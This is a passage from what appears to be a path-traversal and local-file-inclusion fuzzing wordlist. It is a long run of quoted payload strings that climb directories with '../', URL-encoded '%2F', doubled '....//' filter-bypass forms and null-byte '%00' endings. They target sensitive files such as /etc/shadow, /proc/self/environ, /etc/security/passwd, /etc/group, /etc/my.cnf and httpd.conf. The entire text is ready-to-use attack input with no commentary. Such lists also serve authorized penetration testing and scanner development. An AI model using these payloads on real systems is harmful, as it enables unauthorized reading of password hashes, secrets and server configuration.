..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","//proc/self/environ","....//proc/self/environ","....//....//proc/self/environ","....//....//....//proc/self/environ","....//....//....//....//proc/self/e
nviron","....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//....//proc/self/environ","//proc/self/environ%00","....//proc/self/environ%00","....//....//proc/self/environ%00","....//....//....//proc/self/environ%00","....//....//....//....//proc/self/environ%00","....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//....//proc/self/environ%00","%2f%2Fproc/self/environ","....%2f%2Fproc/self/environ","....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","%2f%2Fproc/self/environ%00","....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2
F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","/etc/shadow","../etc/shadow","../../etc/shadow","../../../etc/shadow","../../../../etc/shadow","../../../../../etc/shadow","../../../../../../etc/shadow","../../../../../../../etc/shadow","../../../../../../../../etc/shadow","../../../../../../../../../etc/shadow","../../../../../../../../../../etc/shadow","/etc/shadow%00","../etc/shadow%00","../../etc/shadow%00","../../../etc/shadow%00","../../../../etc/shadow%00","../../../../../etc/shadow%00","../../../../../../etc/shadow%00","../../../../../../../etc/shadow%00","../../../../../../../../etc/shadow%00","../../../../../../../../../etc/shadow%00","../../../../../../../../../../etc/shadow%00","%2Fetc..%2Fshadow","..%2Fetc%2Fshadow","..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","%2Fetc..%2Fshadow%00","..%2Fetc%2Fshadow%00","..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F
shadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","%2F%2Fetc/shadow","....%2f%2Fetc/shadow","....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","%2F%2Fetc/shadow%00","....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....//etc/shadow","....//....//etc/shadow","....//....//....//etc/shadow","....//....//....//....//etc/shadow","....//....//....//....//....//etc/shadow","....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//...
.//....//....//....//etc/shadow","....//etc/shadow%00","....//....//etc/shadow%00","....//....//....//etc/shadow%00","....//....//....//....//etc/shadow%00","....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//....//etc/shadow%00","/etc/group","../etc/group","../../etc/group","../../../etc/group","../../../../etc/group","../../../../../etc/group","../../../../../../etc/group","../../../../../../../etc/group","../../../../../../../../etc/group","../../../../../../../../../etc/group","../../../../../../../../../../etc/group","/etc/group%00","../etc/group%00","../../etc/group%00","../../../etc/group%00","../../../../etc/group%00","../../../../../etc/group%00","../../../../../../etc/group%00","../../../../../../../etc/group%00","../../../../../../../../etc/group%00","../../../../../../../../../etc/group%00","../../../../../../../../../../etc/group%00","%2Fetc..%2Fgroup","..%2Fetc%2Fgroup","..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","%2Fetc%2Fgroup%00","..%2Fetc%2Fgroup%00","..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","%2F%2Fetc/group","....%2F%2Fetc/group","....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","/etc/group%00","....%2F%2Fetc/group%00","....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","//etc/group","....//etc/group","....//....//etc/group","....//....//....//etc/group","....//....//....//....//etc/group","....//....//....//....//....//etc/group","....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//....//etc/group","//etc/group%00","....//etc/group%00","....//....//etc/group%00","....//....//...
.//etc/group%00","....//....//....//....//etc/group%00","....//....//....//....//....//etc/group%00","....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//....//etc/group%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpasswd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fe
tc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","...
.//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpass
wd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F...
.%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/group","../etc/security/group","../../etc/security/group","../../../etc/security/group","../../../../etc/security/group","../../../../../etc/security
/group","../../../../../../etc/security/group","../../../../../../../etc/security/group","../../../../../../../../etc/security/group","../../../../../../../../../etc/security/group","../../../../../../../../../../etc/security/group","/etc/security/group%00","../etc/security/group%00","../../etc/security/group%00","../../../etc/security/group%00","../../../../etc/security/group%00","../../../../../etc/security/group%00","../../../../../../etc/security/group%00","../../../../../../../etc/security/group%00","../../../../../../../../etc/security/group%00","../../../../../../../../../etc/security/group%00","../../../../../../../../../../etc/security/group%00","%2Fetc%2Fsecurity%2Fgroup","..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","%2Fetc%2Fsecurity%2Fgroup%00","..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","%2F%2Fetc/security/group","....%2F%2Fetc/security/group","....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/sec
urity/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","%2F%2Fetc/security/group%00","....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","//etc/security/group","....//etc/security/group","....//....//etc/security/group","....//....//....//etc/security/group","....//....//....//....//etc/security/group","....//....//....//....//....//etc/security/group","....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//....//etc/security/group","//etc/security/group%00",".
...//etc/security/group%00","....//....//etc/security/group%00","....//....//....//etc/security/group%00","....//....//....//....//etc/security/group%00","....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//....//etc/security/group%00","/etc/host.deny","../etc/host.deny","../../etc/host.deny","../../../etc/host.deny","../../../../..//etc/host.deny","/etc/my.cnf","..//etc/my.cnf","../etc/my.cnf","../../../etc/my.cnf","../../../../etc/my.cnf","../../../../../etc/my.cnf","../../../../../../etc/my.cnf","../../../../../../../etc/my.cnf","../../../../../../../../etc/my.cnf","../../../../../../../../../etc/my.cnf","..//etc/my.cnf","..//..//..//etc/my.cnf","..//..//..//..//etc/my.cnf","..//..//..//..//..//etc/my.cnf","..//..//..//..//..//..//etc/my.cnf","..//..//..//..//..//..//..//etc/my.cnf","..//..//..//..//..//..//..//..//etc/my.cnf","..//..//..//..//..//..//..//..//..//etc/my.cnf","/etc/host.allow","../etc/host.allow","../../etc/host.allow","../../../etc/host.allow","../../../../etc/host.allow","../../../../../etc/host.allow","../../../../../../../etc/host.allow","../../../../../../../../../etc/host.allow","../../../../../../../../../../../etc/host.allow","../../../../../../../../../../../../../../etc/host.allow","//etc/host.allow","..//etc/host.allow","..//..//etc/host.allow","..//..//..//etc/host.allow","..//..//..//..//etc/host.allow","..//..//..//..//..//etc/host.allow","..//..//..//..//..//..//..//etc/host.allow","..//..//..//..//..//..//..//..//..//etc/host.allow","..//..//..//..//..//..//..//..//..//..//..//etc/host.allow","..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc/host.allow","/etc/httpd/conf/httpd.conf","../etc/httpd
